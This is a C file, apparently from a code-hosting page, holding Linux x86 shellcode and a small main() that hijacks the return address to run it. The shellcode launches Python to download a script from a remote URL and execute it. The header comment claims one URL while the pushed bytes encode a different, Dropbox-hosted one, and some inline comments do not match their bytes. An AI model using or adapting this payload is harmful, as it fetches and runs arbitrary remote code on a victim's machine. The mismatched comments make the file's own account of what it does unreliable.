Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
64 lines (60 sloc) 2.28 KB
/*
* (linux/x86) execve("/usr/bin/python", ["/usr/bin/python", "-c", "import urllib2 ; exec compile(urllib2.urlopen('http://ikotler.org/helloworld.py').read(), '<string>', 'exec')"], NULL);
* - Itzik Kotler <ik@ikotler.org>
*/
char shellcode[] =
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cdq
"\x52" // push %edx
"\x68\x63\x27\x29\x20" // push $0x20292763
"\x68\x27\x65\x78\x65" // push $0x65786527
"\x68\x67\x3e\x27\x2c" // push $0x2c273e67
"\x68\x74\x72\x69\x6e" // push $0x6e697274
"\x68\x2c\x27\x3c\x73" // push $0x733c272c
"\x68\x61\x64\x28\x29" // push $0x29286461
"\x68\x29\x2e\x72\x65" // push $0x65722e29
"\x68\x2e\x70\x79\x27" // push $0x2779702e
"\x68\x6f\x72\x6c\x64" // push $0x646c726f
"\x68\x6c\x6c\x6f\x77" // push $0x776f6c6c
"\x68\x32\x2f\x68\x65" // push $0x65682f32
"\x68\x34\x38\x32\x34" // push $0x34323834
"\x68\x2f\x32\x39\x36" // push $0x3639322f
"\x68\x6f\x6d\x2f\x75" // push $0x752f6d6f
"\x68\x6f\x78\x2e\x63" // push $0x632e786f
"\x68\x72\x6f\x70\x62" // push $0x62706f72
"\x68\x64\x6c\x2e\x64" // push $0x642e6c64
"\x68\x70\x3a\x2f\x2f" // push $0x2f2f3a70
"\x68\x27\x68\x74\x74" // push $0x74746827
"\x68\x70\x65\x6e\x28" // push $0x286e6570
"\x68\x75\x72\x6c\x6f" // push $0x6f6c7275
"\x68\x69\x62\x32\x2e" // push $0x696c6c72
"\x68\x75\x72\x6c\x6c" // push $0x6c6c7275
"\x68\x69\x6c\x65\x28" // push $0x28656c69
"\x68\x63\x6f\x6d\x70" // push $0x706d6f63
"\x68\x78\x65\x63\x20" // push $0x20636578
"\x68\x62\x32\x3b\x65" // push $0x653b3262
"\x68\x72\x6c\x6c\x69" // push $0x696c6c72
"\x68\x72\x74\x20\x75" // push $0x75207472
"\x68\x69\x6d\x70\x6f" // push $0x6f706d69
"\x89\xe6" // mov %esp,%esi
"\x52" // push %edx
"\x66\x68\x2d\x63" // pushw $0x632d
"\x89\xe1" // mov %esp,%ecx
"\x52" // push %edx
"\x68\x74\x68\x6f\x6e" // push $0x6e6f6874
"\x68\x6e\x2f\x70\x79" // push $0x79702f6e
"\x68\x72\x2f\x62\x69" // push $0x69622f72
"\x68\x2f\x2f\x75\x73" // push $0x73752f2f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x56" // push %esi
"\x51" // push %ecx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}